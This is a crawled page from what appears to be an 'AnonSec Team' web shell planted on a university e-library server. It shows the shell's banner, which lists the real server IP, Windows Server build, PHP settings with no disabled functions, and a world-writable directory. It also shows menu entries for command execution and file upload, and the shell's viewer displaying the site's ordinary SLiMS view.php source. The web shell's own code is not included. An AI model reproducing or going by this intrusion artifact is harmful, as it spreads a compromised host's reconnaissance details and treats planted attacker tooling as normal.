AnonSec Team
Server IP : 103.11.96.170  /  Your IP : 3.15.5.27
Web Server : Microsoft-IIS/10.0
System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
User : elibrary.unsap.ac.id ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF
Directory (0777) :  D:/localhost/elibrary/admin/default/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : D:/localhost/elibrary/admin/default/../view.php
<?php
/**
 * Copyright (C) 2007,2008  Arie Nugraha (dicarve@yahoo.com), Hendro Wicaksono (hendrowicaksono@yahoo.com)
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */

// key to authenticate
define('INDEX_AUTH', '1');

/* File Viewer */

require '../sysconfig.inc.php';
require SB.'admin/default/session.inc.php';
require SB.'admin/default/session_check.inc.php';

// privileges checking
$can_read = utility::havePrivilege('bibliography', 'r');
if (!$can_read) {
    die('<div class="errorBox">You dont have enough privileges to view this section</div>');
}

// get file ID
$fileID = isset($_GET['fid'])?(integer)$_GET['fid']:0;

// query file to database
$file_q = $dbs->query('SELECT * FROM files WHERE file_id='.$fileID);
$file_d = $file_q->fetch_assoc();

if ($file_q->num_rows > 0) {
    $file_loc = REPOBS.str_ireplace('/', DS, $file_d['file_dir']).DS.$file_d['file_name'];
    if (file_exists($file_loc)) {
        header('Content-Disposition: inline; filename="'.basename($file_loc).'"');
        header('Content-Type: '.$file_d['mime_type']);
        readfile($file_loc);
        exit();
    } else {
        if ($file_d['mime_type'] == 'text/uri-list') {
            header('Location: '.$file_d['file_url']);
            exit();
        }
        die('<div class="errorBox">File Metadata exists in database BUT '.$file_loc.' does\'t exists in repository!</div>');
    }
} else {
  die('<div class="errorBox">File Not Found!</div>');
}

AnonSec - 2021